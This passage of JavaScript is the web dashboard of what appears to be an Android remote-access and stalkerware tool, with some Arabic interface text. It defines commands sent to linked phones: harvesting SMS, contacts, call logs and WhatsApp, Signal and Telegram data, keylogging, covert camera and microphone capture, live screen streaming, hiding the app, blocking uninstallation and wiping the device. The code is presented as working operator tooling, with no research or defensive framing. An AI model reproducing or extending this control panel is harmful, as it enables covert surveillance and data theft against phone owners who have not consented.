     1вҶ’    60вҶ’    89вҶ’    89вҶ’    89вҶ’  3088вҶ’<div><span style="color:var(--text2)">Model:</span> ${d.model||'-'}</div>
     2вҶ’    61вҶ’    90вҶ’    90вҶ’    90вҶ’  3089вҶ’<div><span style="color:var(--text2)">OS:</span> ${d.os||'-'}</div>
     3вҶ’    62вҶ’    91вҶ’    91вҶ’    91вҶ’  3090вҶ’<div><span style="color:var(--text2)">Battery:</span> ${d.battery||'-'}%</div>
     4вҶ’    63вҶ’    92вҶ’    92вҶ’    92вҶ’  3091вҶ’<div><span style="color:var(--text2)">Network:</span> ${d.network||'-'}</div>
     5вҶ’    64вҶ’    93вҶ’    93вҶ’    93вҶ’  3092вҶ’<div><span style="color:var(--text2)">Location:</span> ${d.location||'-'}</div>
     6вҶ’    65вҶ’    94вҶ’    94вҶ’    94вҶ’  3093вҶ’<div><span style="color:var(--text2)">Last Seen:</span> ${d.last_seen||'-'}</div>
     7вҶ’    66вҶ’    95вҶ’    95вҶ’    95вҶ’  3094вҶ’</div>
     8вҶ’    67вҶ’    96вҶ’    96вҶ’    96вҶ’  3095вҶ’<h3>рҹ“Ӣ Recent Commands</h3>
     9вҶ’    68вҶ’    97вҶ’    97вҶ’    97вҶ’  3096вҶ’${cmds.length?cmds.map(c=>`<div class="cmd-item"><div class="cmd-header"><span>${c.command}</span><span class="badge badge-${c.status==='completed'?'green':c.status==='pending'?'yellow':'blue'}">${c.status}</span></div><div style="color:var(--text2);font-size:12px">${c.created_at} | ID: ${c.id}</div></div>`).join(''):'<div class="empty">No commands</div>'}
    10вҶ’    69вҶ’    98вҶ’    98вҶ’    98вҶ’  3097вҶ’<button class="btn btn-danger btn-sm" onclick="unlinkDevice('${d.id}')" style="margin-top:16px">рҹ—‘пёҸ Unlink Device</button>`;
    11вҶ’    70вҶ’    99вҶ’    99вҶ’    99вҶ’  3098вҶ’detail.scrollIntoView({behavior:'smooth'});
    12вҶ’    71вҶ’   100вҶ’   100вҶ’   100вҶ’  3099вҶ’}catch(e){}
    13вҶ’    72вҶ’   101вҶ’   101вҶ’   101вҶ’  3100вҶ’}
    14вҶ’    73вҶ’   102вҶ’   102вҶ’   102вҶ’  3101вҶ’
    15вҶ’    74вҶ’   103вҶ’   103вҶ’   103вҶ’  3102вҶ’async function unlinkDevice(id){
    16вҶ’    75вҶ’   104вҶ’   104вҶ’   104вҶ’  3103вҶ’if(!confirm('Unlink this device?'))return;
    17вҶ’    76вҶ’   105вҶ’   105вҶ’   105вҶ’  3104вҶ’const r=await api('web/unlink/'+id,{method:'DELETE'});
    18вҶ’    77вҶ’   106вҶ’   106вҶ’   106вҶ’  3105вҶ’if(r.ok){notify('Device unlinked');loadAll();}
    19вҶ’    78вҶ’   107вҶ’   107вҶ’   107вҶ’  3106вҶ’else notify('Failed','var(--accent)');
    20вҶ’    79вҶ’   108вҶ’   108вҶ’   108вҶ’  3107вҶ’}
    21вҶ’    80вҶ’   109вҶ’   109вҶ’   109вҶ’  3108вҶ’
    22вҶ’    81вҶ’   110вҶ’   110вҶ’   110вҶ’  3109вҶ’async function generateLink(){
    23вҶ’    82вҶ’   111вҶ’   111вҶ’   111вҶ’  3110вҶ’const r=await api('web/link_code');
    24вҶ’    83вҶ’   112вҶ’   112вҶ’   112вҶ’  3111вҶ’if(r.ok){
    25вҶ’    84вҶ’   113вҶ’   113вҶ’   113вҶ’  3112вҶ’const box=document.getElementById('linkCodeBox');
    26вҶ’    85вҶ’   114вҶ’   114вҶ’   114вҶ’  3113вҶ’document.getElementById('linkCodeText').textContent=r.code;
    27вҶ’    86вҶ’   115вҶ’   115вҶ’   115вҶ’  3114вҶ’box.style.display='block';
    28вҶ’    87вҶ’   116вҶ’   116вҶ’   116вҶ’  3115вҶ’notify('Link code generated!');
    29вҶ’    88вҶ’   117вҶ’   117вҶ’   117вҶ’  3116вҶ’}
    30вҶ’    89вҶ’   118вҶ’   118вҶ’   118вҶ’  3117вҶ’}
    31вҶ’    90вҶ’   119вҶ’   119вҶ’   119вҶ’  3118вҶ’
    32вҶ’    91вҶ’   120вҶ’   120вҶ’   120вҶ’  3119вҶ’const CMD_CATEGORIES={
    33вҶ’    92вҶ’   121вҶ’   121вҶ’   121вҶ’  3120вҶ’data:{label:'рҹ“Ҡ Data',cmds:['sms','calls','contacts','location','notifications','apps','info','battery','gallery','clipboard','all_data','wifi_info','bluetooth_devices','network_info','sim_info','storage_info','installed_apps','running_apps','calendar','browser_history']},
    34вҶ’    93вҶ’   122вҶ’   122вҶ’   122вҶ’  3121вҶ’social:{label:'рҹҢҗ Social',cmds:['whatsapp','telegram_app','instagram','messenger','snapchat','tiktok','twitter','viber','signal','facebook','whatsapp_status','whatsapp_stories','telegram_channels','instagram_stories','youtube']},
    35вҶ’    94вҶ’   123вҶ’   123вҶ’   123вҶ’  3122вҶ’control:{label:'рҹҺ® Control',cmds:['ping','vibrate','ring','screenshot','front_camera','back_camera','record_audio','record_video','lock_phone','unlock_phone','reboot','shutdown','set_volume','set_brightness','enable_wifi','disable_wifi','enable_bluetooth','disable_bluetooth','enable_mobile_data','disable_mobile_data','enable_hotspot','disable_hotspot','airplane_on','airplane_off','torch_on','torch_off','play_sound','speak_text','open_url','send_sms','make_call','block_number','unblock_number']},
    36вҶ’    95вҶ’   124вҶ’   124вҶ’   124вҶ’  3123вҶ’apps:{label:'рҹ“Ұ Apps',cmds:['open_app','close_app','install_app','uninstall_app','block_app','unblock_app','clear_app_data','force_stop_app','app_info','app_usage','screen_time','app_permissions','enable_app','disable_app','list_blocked','clear_cache','update_app','launch_app','kill_app','app_cache']},
    37вҶ’    96вҶ’   125вҶ’   125вҶ’   125вҶ’  3124вҶ’files:{label:'рҹ“Ӯ Files',cmds:['list_files','get_file','download_file','list_downloads','list_dcim','list_music','list_videos','list_documents','list_whatsapp','list_telegram_files','send_contacts_backup','send_sms_backup','send_calls_backup','send_full_backup','delete_file','rename_file','copy_file','move_file','create_folder','search_files','recent_files','file_info','zip_files']},
    38вҶ’    97вҶ’   126вҶ’   126вҶ’   126вҶ’  3125вҶ’security:{label:'рҹ”’ Security',cmds:['wipe_data','factory_reset','show_app','hide_app','change_passcode','set_pin','remove_pin','enable_biometric','disable_biometric','anti_uninstall_on','anti_uninstall_off','device_admin_status','check_root','set_screen_lock','remove_screen_lock']},
    39вҶ’    98вҶ’   127вҶ’   127вҶ’   127вҶ’  3126вҶ’monitor:{label:'рҹ”Қ Monitor',cmds:['keylogger_start','keylogger_stop','get_keylogger','screen_record_start','screen_record_stop','clipboard_monitor_start','clipboard_monitor_stop','get_clipboard_log','wifi_monitor_start','wifi_monitor_stop','app_monitor_start','app_monitor_stop','get_app_log','location_live','location_stop','location_history','geo_add','geo_remove','geo_list','sms_monitor','call_monitor']},
    40вҶ’    99вҶ’   128вҶ’   128вҶ’   128вҶ’  3127вҶ’syssettings:{label:'вҡҷпёҸ System',cmds:['set_language','set_timezone','set_alarm','set_timer','set_reminder','enable_dev_mode','disable_dev_mode','enable_usb_debug','disable_usb_debug','dns_change','proxy_set','apn_settings','nfc_on','nfc_off','auto_update_on','auto_update_off']}
    41вҶ’   100вҶ’   129вҶ’   129вҶ’   129вҶ’  3128вҶ’};
    42вҶ’   101вҶ’   130вҶ’   130вҶ’   130вҶ’  3129вҶ’
    43вҶ’   102вҶ’   131вҶ’   131вҶ’   131вҶ’  3130вҶ’function initCmdTabs(){
    44вҶ’   103вҶ’   132вҶ’   132вҶ’   132вҶ’  3131вҶ’const tabs=document.getElementById('cmdTabs');
    45вҶ’   104вҶ’   133вҶ’   133вҶ’   133вҶ’  3132вҶ’tabs.innerHTML=Object.keys(CMD_CATEGORIES).map(k=>`<button class="tab${k==='data'?' active':''}" onclick="showCmdCat('${k}',this)">${CMD_CATEGORIES[k].label}</button>`).join('');
    46вҶ’   105вҶ’   134вҶ’   134вҶ’   134вҶ’  3133вҶ’showCmdCat('data');
    47вҶ’   106вҶ’   135вҶ’   135вҶ’   135вҶ’  3134вҶ’}
    48вҶ’   107вҶ’   136вҶ’   136вҶ’   136вҶ’  3135вҶ’
    49вҶ’   108вҶ’   137вҶ’   137вҶ’   137вҶ’  3136вҶ’function showCmdCat(cat,btn){
    50вҶ’   109вҶ’   138вҶ’   138вҶ’   138вҶ’  3137вҶ’if(btn){document.querySelectorAll('#cmdTabs .tab').forEach(t=>t.classList.remove('active'));btn.classList.add('active');}
    51вҶ’   110вҶ’   139вҶ’   139вҶ’   139вҶ’  3138вҶ’const grid=document.getElementById('cmdGrid');
    52вҶ’   111вҶ’   140вҶ’   140вҶ’   140вҶ’  3139вҶ’grid.innerHTML=CMD_CATEGORIES[cat].cmds.map(c=>`<button class="cmd-btn" onclick="sendDeviceCmd('${c}')">${c.replace(/_/g,' ')}</button>`).join('');
    53вҶ’   112вҶ’   141вҶ’   141вҶ’   141вҶ’  3140вҶ’}
    54вҶ’   113вҶ’   142вҶ’   142вҶ’   142вҶ’  3141вҶ’
    55вҶ’   114вҶ’   143вҶ’   143вҶ’   143вҶ’  3142вҶ’async function sendDeviceCmd(cmd){
    56вҶ’   115вҶ’   144вҶ’   144вҶ’   144вҶ’  3143вҶ’const devId=document.getElementById('cmdDevice').value;
    57вҶ’   116вҶ’   145вҶ’   145вҶ’   145вҶ’  3144вҶ’if(!devId){notify('Select a device','var(--accent)');return;}
    58вҶ’   117вҶ’   146вҶ’   146вҶ’   146вҶ’  3145вҶ’const r=await api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})});
    59вҶ’   118вҶ’   147вҶ’   147вҶ’   147вҶ’  3146вҶ’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
    60вҶ’   119вҶ’   148вҶ’   148вҶ’   148вҶ’  3147вҶ’loadAll();
    61вҶ’   120вҶ’   149вҶ’   149вҶ’   149вҶ’  3148вҶ’}
    62вҶ’   121вҶ’   150вҶ’   150вҶ’   150вҶ’  3149вҶ’
    63вҶ’   122вҶ’   151вҶ’   151вҶ’   151вҶ’  3150вҶ’function sendCmd(cmd){
    64вҶ’   123вҶ’   152вҶ’   152вҶ’   152вҶ’  3151вҶ’const devId=document.getElementById('fileDevice').value;
    65вҶ’   124вҶ’   153вҶ’   153вҶ’   153вҶ’  3152вҶ’if(!devId){notify('Select a device','var(--accent)');return;}
    66вҶ’   125вҶ’   154вҶ’   154вҶ’   154вҶ’  3153вҶ’api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})}).then(r=>{
    67вҶ’   126вҶ’   155вҶ’   155вҶ’   155вҶ’  3154вҶ’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
    68вҶ’   127вҶ’   156вҶ’   156вҶ’   156вҶ’  3155вҶ’});
    69вҶ’   128вҶ’   157вҶ’   157вҶ’   157вҶ’  3156вҶ’}
    70вҶ’   129вҶ’   158вҶ’   158вҶ’   158вҶ’  3157вҶ’function sendDataCmd(cmd){
    71вҶ’   130вҶ’   159вҶ’   159вҶ’   159вҶ’  3158вҶ’const devId=document.getElementById('dataDevice').value;
    72вҶ’   131вҶ’   160вҶ’   160вҶ’   160вҶ’  3159вҶ’if(!devId){notify('Select a device','var(--accent)');return;}
    73вҶ’   132вҶ’   161вҶ’   161вҶ’   161вҶ’  3160вҶ’api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:'get_'+cmd})}).then(r=>{
    74вҶ’   133вҶ’   162вҶ’   162вҶ’   162вҶ’  3161вҶ’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
    75вҶ’   134вҶ’   163вҶ’   163вҶ’   163вҶ’  3162вҶ’});
    76вҶ’   135вҶ’   164вҶ’   164вҶ’   164вҶ’  3163вҶ’}
    77вҶ’   136вҶ’   165вҶ’   165вҶ’   165вҶ’  3164вҶ’function sendMonCmd(cmd){
    78вҶ’   137вҶ’   166вҶ’   166вҶ’   166вҶ’  3165вҶ’const devId=document.getElementById('monDevice').value;
    79вҶ’   138вҶ’   167вҶ’   167вҶ’   167вҶ’  3166вҶ’if(!devId){notify('Select a device','var(--accent)');return;}
    80вҶ’   139вҶ’   168вҶ’   168вҶ’   168вҶ’  3167вҶ’api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})}).then(r=>{
    81вҶ’   140вҶ’   169вҶ’   169вҶ’   169вҶ’  3168вҶ’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
    82вҶ’   141вҶ’   170вҶ’   170вҶ’   170вҶ’  3169вҶ’});
    83вҶ’   142вҶ’   171вҶ’   171вҶ’   171вҶ’  3170вҶ’}
    84вҶ’   143вҶ’   172вҶ’   172вҶ’   172вҶ’  3171вҶ’
    85вҶ’   144вҶ’   173вҶ’   173вҶ’   173вҶ’  3172вҶ’function renderCommandLog(cmds){
    86вҶ’   145вҶ’   174вҶ’   174вҶ’   174вҶ’  3173вҶ’const el=document.getElementById('cmdLog');
    87вҶ’   146вҶ’   175вҶ’   175вҶ’   175вҶ’  3174вҶ’const dash=document.getElementById('dashCommands');
    88вҶ’   147вҶ’   176вҶ’   176вҶ’   176вҶ’  3175вҶ’const items=(cmds||[]).slice(-20).reverse();
    89вҶ’   148вҶ’   177вҶ’   177вҶ’   177вҶ’  3176вҶ’if(!items.length){el.innerHTML='<div class="empty">No commands</div>';dash.innerHTML='';return;}
    90вҶ’   149вҶ’   178вҶ’   178вҶ’   178вҶ’  3177вҶ’const html=items.map(c=>`<div class="cmd-item"><div class="cmd-header"><span>${c.command}</span><span class="badge badge-${c.status==='completed'?'green':c.status==='pending'?'yellow':'blue'}">${c.status}</span></div><div style="color:var(--text2);font-size:12px">Device: ${c.device_id} | ${c.created_at}</div></div>`).join('');
    91вҶ’   150вҶ’   179вҶ’   179вҶ’   179вҶ’  3178вҶ’el.innerHTML=html;
    92вҶ’   151вҶ’   180вҶ’   180вҶ’   180вҶ’  3179вҶ’dash.innerHTML=html;
    93вҶ’   152вҶ’   181вҶ’   181вҶ’   181вҶ’  3180вҶ’}
    94вҶ’   153вҶ’   182вҶ’   182вҶ’   182вҶ’  3181вҶ’
    95вҶ’   154вҶ’   183вҶ’   183вҶ’   183вҶ’  3182вҶ’async function loadEvents(){
    96вҶ’   155вҶ’   184вҶ’   184вҶ’   184вҶ’  3183вҶ’const r=await api('web/events');
    97вҶ’   156вҶ’   185вҶ’   185вҶ’   185вҶ’  3184вҶ’if(r.ok){
    98вҶ’   157вҶ’   186вҶ’   186вҶ’   186вҶ’  3185вҶ’const el=document.getElementById('eventLog');
    99вҶ’   158вҶ’   187вҶ’   187вҶ’   187вҶ’  3186вҶ’el.innerHTML=(r.events||[]).slice(-50).reverse().map(e=>`<div class="log-item"><span class="time">${(e.time||'').slice(0,19)}</span><span class="event">${e.event} ${e.details?JSON.stringify(e.details).slice(0,60):''}</span></div>`).join('')||'<div class="empty">No events</div>';
   100вҶ’   159вҶ’   188вҶ’   188вҶ’   188вҶ’  3187вҶ’}
   101вҶ’   160вҶ’   189вҶ’   189вҶ’   189вҶ’  3188вҶ’}
   102вҶ’   161вҶ’   190вҶ’   190вҶ’   190вҶ’  3189вҶ’
   103вҶ’   162вҶ’   191вҶ’   191вҶ’   191вҶ’  3190вҶ’async function loadSettings(){
   104вҶ’   163вҶ’   192вҶ’   192вҶ’   192вҶ’  3191вҶ’const r=await api('web/settings');
   105вҶ’   164вҶ’   193вҶ’   193вҶ’   193вҶ’  3192вҶ’if(r.ok){
   106вҶ’   165вҶ’   194вҶ’   194вҶ’   194вҶ’  3193вҶ’const s=r.settings;
   107вҶ’   166вҶ’   195вҶ’   195вҶ’   195вҶ’  3194вҶ’document.getElementById('settingsForm').innerHTML=`
   108вҶ’   167вҶ’   196вҶ’   196вҶ’   196вҶ’  3195вҶ’<label style="display:block;margin-bottom:12px">рҹ”‘ Admin Password<input id="setPass" value="${s.admin_password||'admin'}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
   109вҶ’   168вҶ’   197вҶ’   197вҶ’   197вҶ’  3196вҶ’<label style="display:block;margin-bottom:12px">вҸұпёҸ Sync Interval (sec)<input id="setSync" type="number" value="${s.sync_interval||300}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
   110вҶ’   169вҶ’   198вҶ’   198вҶ’   198вҶ’  3197вҶ’<label style="display:block;margin-bottom:12px">рҹ“Қ Location Interval (sec)<input id="setLoc" type="number" value="${s.location_interval||60}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
   111вҶ’   170вҶ’   199вҶ’   199вҶ’   199вҶ’  3198вҶ’<label style="display:block;margin-bottom:12px">рҹҢҗ Language<select id="setLang" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"><option value="ar" ${s.language==='ar'?'selected':''}>Arabic</option><option value="en" ${s.language==='en'?'selected':''}>English</option></select></label>
   112вҶ’   171вҶ’   200вҶ’   200вҶ’   200вҶ’  3199вҶ’<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setNotif" ${s.notifications?'checked':''}> рҹ”” Notifications</label>
   113вҶ’   172вҶ’   201вҶ’   201вҶ’   201вҶ’  3200вҶ’<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setAutoLoc" ${s.auto_location?'checked':''}> рҹ—әпёҸ Auto Location</label>
   114вҶ’   173вҶ’   202вҶ’   202вҶ’   202вҶ’  3201вҶ’<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setAutoSync" ${s.auto_sync?'checked':''}> рҹ”„ Auto Sync</label>`;
   115вҶ’   174вҶ’   203вҶ’   203вҶ’   203вҶ’  3202вҶ’}
   116вҶ’   175вҶ’   204вҶ’   204вҶ’   204вҶ’  3203вҶ’}
   117вҶ’   176вҶ’   205вҶ’   205вҶ’   205вҶ’  3204вҶ’
   118вҶ’   177вҶ’   206вҶ’   206вҶ’   206вҶ’  3205вҶ’async function saveSettings(){
   119вҶ’   178вҶ’   207вҶ’   207вҶ’   207вҶ’  3206вҶ’const data={
   120вҶ’   179вҶ’   208вҶ’   208вҶ’   208вҶ’  3207вҶ’admin_password:document.getElementById('setPass').value,
   121вҶ’   180вҶ’   209вҶ’   209вҶ’   209вҶ’  3208вҶ’sync_interval:parseInt(document.getElementById('setSync').value),
   122вҶ’   181вҶ’   210вҶ’   210вҶ’   210вҶ’  3209вҶ’location_interval:parseInt(document.getElementById('setLoc').value),
   123вҶ’   182вҶ’   211вҶ’   211вҶ’   211вҶ’  3210вҶ’language:document.getElementById('setLang').value,
   124вҶ’   183вҶ’   212вҶ’   212вҶ’   212вҶ’  3211вҶ’notifications:document.getElementById('setNotif').checked,
   125вҶ’   184вҶ’   213вҶ’   213вҶ’   213вҶ’  3212вҶ’auto_location:document.getElementById('setAutoLoc').checked,
   126вҶ’   185вҶ’   214вҶ’   214вҶ’   214вҶ’  3213вҶ’auto_sync:document.getElementById('setAutoSync').checked,
   127вҶ’   186вҶ’   215вҶ’   215вҶ’   215вҶ’  3214вҶ’};
   128вҶ’   187вҶ’   216вҶ’   216вҶ’   216вҶ’  3215вҶ’const r=await api('web/settings',{method:'PUT',body:JSON.stringify(data)});
   129вҶ’   188вҶ’   217вҶ’   217вҶ’   217вҶ’  3216вҶ’if(r.ok)notify('Settings saved!');else notify('Failed','var(--accent)');
   130вҶ’   189вҶ’   218вҶ’   218вҶ’   218вҶ’  3217вҶ’}
   131вҶ’   190вҶ’   219вҶ’   219вҶ’   219вҶ’  3218вҶ’
   132вҶ’   191вҶ’   220вҶ’   220вҶ’   220вҶ’  3219вҶ’if(TOKEN){showApp();}
   133вҶ’   192вҶ’   221вҶ’   221вҶ’   221вҶ’  3220вҶ’initCmdTabs();
   134вҶ’   193вҶ’   222вҶ’   222вҶ’   222вҶ’  3221вҶ’setTimeout(loadSettings,500);
   135вҶ’   194вҶ’   223вҶ’   223вҶ’   223вҶ’  3222вҶ’
   136вҶ’   195вҶ’   224вҶ’   224вҶ’   224вҶ’  3223вҶ’// ========== LIVE STREAMING (JPEG Screenshot-based) ==========
   137вҶ’   196вҶ’   225вҶ’   225вҶ’   225вҶ’  3224вҶ’let _streamType='screen';
   138вҶ’   197вҶ’   226вҶ’   226вҶ’   226вҶ’  3225вҶ’let _streamActive=false;
   139вҶ’   198вҶ’   227вҶ’   227вҶ’   227вҶ’  3226вҶ’let _streamPollTimer=null;
   140вҶ’   199вҶ’   228вҶ’   228вҶ’   228вҶ’  3227вҶ’let _frameCount=0;
   141вҶ’   200вҶ’   229вҶ’   229вҶ’   229вҶ’  3228вҶ’let _audioAnimFrame=null;
   142вҶ’   201вҶ’   230вҶ’   230вҶ’   230вҶ’  3229вҶ’let _streamWaitingTimer=null;
   143вҶ’   202вҶ’   231вҶ’   231вҶ’   231вҶ’  3230вҶ’let _firstFrameReceived=false;
   144вҶ’   203вҶ’   232вҶ’   232вҶ’   232вҶ’  3231вҶ’let _lastFrameData='';
   145вҶ’   204вҶ’   233вҶ’   233вҶ’   233вҶ’  3232вҶ’let _streamQuality=3;
   146вҶ’   205вҶ’   234вҶ’   234вҶ’   234вҶ’  3233вҶ’
   147вҶ’   206вҶ’   235вҶ’   235вҶ’   235вҶ’  3234вҶ’
   148вҶ’   207вҶ’   236вҶ’   236вҶ’   236вҶ’  3235вҶ’
   149вҶ’   208вҶ’   237вҶ’   237вҶ’   237вҶ’  3236вҶ’function onStreamDeviceChange(){
   150вҶ’   209вҶ’   238вҶ’   238вҶ’   238вҶ’  3237вҶ’const devId=document.getElementById('streamDevice').value;
   151вҶ’   210вҶ’   239вҶ’   239вҶ’   239вҶ’  3238вҶ’document.getElementById('stDevice').textContent=devId?((DEVICES.find(function(d){return d.id===devId;})||{}).name||devId):'-';
   152вҶ’   211вҶ’   240вҶ’   240вҶ’   240вҶ’  3239вҶ’if(_streamActive)stopStream();
   153вҶ’   212вҶ’   241вҶ’   241вҶ’   241вҶ’  3240вҶ’}
   154вҶ’   213вҶ’   242вҶ’   242вҶ’   242вҶ’  3241вҶ’
   155вҶ’   214вҶ’   243вҶ’   243вҶ’   243вҶ’  3242вҶ’function selectStreamType(type){
   156вҶ’   215вҶ’   244вҶ’   244вҶ’   244вҶ’  3243вҶ’_streamType=type;
   157вҶ’   216вҶ’   245вҶ’   245вҶ’   245вҶ’  3244вҶ’document.querySelectorAll('.stream-type-btn').forEach(function(b){b.classList.remove('active');});
   158вҶ’   217вҶ’   246вҶ’   246вҶ’   246вҶ’  3245вҶ’var btnId=type==='screen'?'stScreen':type==='camera'?'stCamera':'stAudio';
   159вҶ’   218вҶ’   247вҶ’   247вҶ’   247вҶ’  3246вҶ’document.getElementById(btnId).classList.add('active');
   160вҶ’   219вҶ’   248вҶ’   248вҶ’   248вҶ’  3247вҶ’document.getElementById('qualityCard').style.display=type==='audio'?'none':'block';
   161вҶ’   220вҶ’   249вҶ’   249вҶ’   249вҶ’  3248вҶ’}
   162вҶ’   221вҶ’   250вҶ’   250вҶ’   250вҶ’  3249вҶ’
   163вҶ’   222вҶ’   251вҶ’   251вҶ’   251вҶ’  3250вҶ’function setQuality(q,btn){
   164вҶ’   223вҶ’   252вҶ’   252вҶ’   252вҶ’  3251вҶ’_streamQuality={'low':8,'medium':3,'high':1}[q]||3;
   165вҶ’   224вҶ’   253вҶ’   253вҶ’   253вҶ’  3252вҶ’document.querySelectorAll('.stream-quality button').forEach(function(b){b.classList.remove('active');});
   166вҶ’   225вҶ’   254вҶ’   254вҶ’   254вҶ’  3253вҶ’btn.classList.add('active');
   167вҶ’   226вҶ’   255вҶ’   255вҶ’   255вҶ’  3254вҶ’notify('ШӘЩ… ШӘШәЩҠЩҠШұ Ш§Щ„Ш¬ЩҲШҜШ©');
   168вҶ’   227вҶ’   256вҶ’   256вҶ’   256вҶ’  3255вҶ’}
   169вҶ’   228вҶ’   257вҶ’   257вҶ’   257вҶ’  3256вҶ’
   170вҶ’   229вҶ’   258вҶ’   258вҶ’   258вҶ’  3257вҶ’function _setViewerState(state){
   171вҶ’   230вҶ’   259вҶ’   259вҶ’   259вҶ’  3258вҶ’var viewer=document.getElementById('streamViewer');
   172вҶ’   231вҶ’   260вҶ’   260вҶ’   260вҶ’  3259вҶ’var noMsg=document.getElementById('noStreamMsg');
   173вҶ’   232вҶ’   261вҶ’   261вҶ’   261вҶ’  3260вҶ’var img=document.getElementById('streamImg');
   174вҶ’   233вҶ’   262вҶ’   262вҶ’   262вҶ’  3261вҶ’var badge=document.getElementById('streamBadge');
   175вҶ’   234вҶ’   263вҶ’   263вҶ’   263вҶ’  3262вҶ’var audioC=document.getElementById('audioPlayerContainer');
   176вҶ’   235вҶ’   264вҶ’   264вҶ’   264вҶ’  3263вҶ’noMsg.style.display='none';img.style.display='none';badge.style.display='none';audioC.style.display='none';viewer.style.background='#000';
   177вҶ’   236вҶ’   265вҶ’   265вҶ’   265вҶ’  3264вҶ’if(state==='idle'){noMsg.style.display='';noMsg.innerHTML='<div style="font-size:48px;margin-bottom:12px">&#x1F4E1;</div>Ш§Ш®ШӘШұ Ш¬ЩҮШ§ШІШ§ЩӢ ЩҲШ§ШЁШҜШЈ Ш§Щ„ШЁШ« Ш§Щ„Щ…ШЁШ§ШҙШұ';viewer.style.background='var(--surface)';}
   178вҶ’   237вҶ’   266вҶ’   266вҶ’   266вҶ’  3265вҶ’else if(state==='waiting'){noMsg.style.display='';noMsg.innerHTML='<div style="text-align:center"><div class="pulse" style="font-size:48px;margin-bottom:16px">&#x231B;</div><div style="font-size:16px;font-weight:600;margin-bottom:8px">Ш¬Ш§ШұЩҠ Ш§ЩҶШӘШёШ§Шұ Ш§Щ„ШөЩҲШұШ© Щ…ЩҶ Ш§Щ„Ш¬ЩҮШ§ШІ...</div><div style="color:var(--text2);font-size:13px">ЩҠШӘЩ… ШҘШұШіШ§Щ„ ШЈЩ…Шұ Щ„ЩӮШ·Ш© Ш§Щ„ШҙШ§ШҙШ© Щ„Щ„Ш¬ЩҮШ§ШІ.<br>ЩӮШҜ ЩҠШіШӘШәШұЩӮ Ш§Щ„ШЈЩ…Шұ ШЁШ¶Ш№ Ш«ЩҲШ§ЩҶЩҚ Щ„Щ„ШҘШ·Ш§Шұ Ш§Щ„ШЈЩҲЩ„.<br>ШӘШЈЩғШҜ ШЈЩҶ Ш§Щ„Ш¬ЩҮШ§ШІ Щ…ШӘШөЩ„ ШЁШ§Щ„ШҘЩҶШӘШұЩҶШӘ ЩҲШЈЩҶ ШҘШ°ЩҶ Ш§Щ„ШӘЩӮШ§Ш· Ш§Щ„ШҙШ§ШҙШ© Щ…Щ…ЩҶЩҲШӯШ©.</div></div>';document.getElementById('stStatus').innerHTML='<span style="color:var(--yellow)">в—Ҹ Ш§ЩҶШӘШёШ§Шұ...</span>';}
   179вҶ’   238вҶ’   267вҶ’   267вҶ’   267вҶ’  3266вҶ’else if(state==='connected'){document.getElementById('stStatus').innerHTML='<span style="color:var(--blue)">в—Ҹ Щ…ШӘШөЩ„ - ЩҠЩҶШӘШёШұ ШҘШ·Ш§Шұ...</span>';}
   180вҶ’   239вҶ’   268вҶ’   268вҶ’   268вҶ’  3267вҶ’else if(state==='receiving_video'){img.style.display='';badge.style.display='';badge.className='stream-badge live';noMsg.style.display='none';document.getElementById('stStatus').innerHTML='<span style="color:var(--green)">в—Ҹ Щ…ШЁШ§ШҙШұ</span>';}
   181вҶ’   240вҶ’   269вҶ’   269вҶ’   269вҶ’  3268вҶ’else if(state==='receiving_audio'){audioC.style.display='block';badge.style.display='';badge.className='stream-badge live';noMsg.style.display='none';document.getElementById('stStatus').innerHTML='<span style="color:var(--green)">в—Ҹ Щ…ШЁШ§ШҙШұ</span>';}
   182вҶ’   241вҶ’   270вҶ’   270вҶ’   270вҶ’  3269вҶ’else if(state==='error'){noMsg.style.display='';noMsg.innerHTML='<div style="text-align:center"><div style="font-size:48px;margin-bottom:16px">&#x26A0;&#xFE0F;</div><div style="font-size:16px;font-weight:600;margin-bottom:8px;color:var(--accent)">Щ„Щ… ЩҠШӘЩ… Ш§ШіШӘЩ„Ш§Щ… Ш§Щ„ШЁШ«</div><div style="color:var(--text2);font-size:13px">ШӘШЈЩғШҜ ШЈЩҶ Ш§Щ„Ш¬ЩҮШ§ШІ Щ…ШӘШөЩ„ ЩҲЩҠЩ…ЩғЩҶЩҮ ШӘЩҶЩҒЩҠШ° ШЈЩ…Шұ Щ„ЩӮШ·Ш© Ш§Щ„ШҙШ§ШҙШ©.<br>ШӘШЈЩғШҜ Щ…ЩҶ Щ…ЩҶШӯ ШҘШ°ЩҶ Ш§Щ„ШӘЩӮШ§Ш· Ш§Щ„ШҙШ§ШҙШ© ЩҒЩҠ ШӘШ·ШЁЩҠЩӮ Ш§Щ„Ш¬ЩҮШ§ШІ.<br>ШӯШ§ЩҲЩ„ Щ…ШұШ© ШЈШ®ШұЩү.</div></div>';document.getElementById('stStatus').innerHTML='<span style="color:var(--accent)">в—Ҹ ЩҒШҙЩ„</span>';}
   183вҶ’   242вҶ’   271вҶ’   271вҶ’   271вҶ’  3270вҶ’}
   184вҶ’   243вҶ’   272вҶ’   272вҶ’   272вҶ’  3271вҶ’
   185вҶ’   244вҶ’   273вҶ’   273вҶ’   273вҶ’  3272вҶ’async function startStream(){
   186вҶ’   245вҶ’   274вҶ’   274вҶ’   274вҶ’  3273вҶ’var devId=document.getElementById('streamDevice').value;
